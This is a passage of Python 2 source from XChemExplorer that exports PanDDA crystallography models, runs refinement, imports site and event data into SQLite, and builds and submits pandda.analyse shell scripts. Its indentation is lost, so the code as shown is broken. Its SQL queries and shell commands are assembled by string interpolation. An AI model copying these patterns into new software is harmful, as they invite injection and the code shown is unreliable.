Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
class run_pandda_export(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
self.import_samples_into_datasouce(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def import_samples_into_datasouce(self,samples_to_export):
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
self.Logfile.insert('reding pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
self.Logfile.insert('add to site_list_:' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('done reading pandda_inspect_sites.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string_new_pannda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
class run_pandda_analyse(QtCore.QThread):
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
number_of_cyles=int(self.number_of_datasets)/int(self.max_new_datasets)
if int(self.number_of_datasets) % int(self.max_new_datasets) != 0: # modulo gives remainder after integer division
number_of_cyles+=1
self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cyles))
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
print('will use ' + filter_pdb + 'as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
for i in range(number_of_cyles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda 5 -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class giant_cluster_datasets(QtCore.QThread):
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
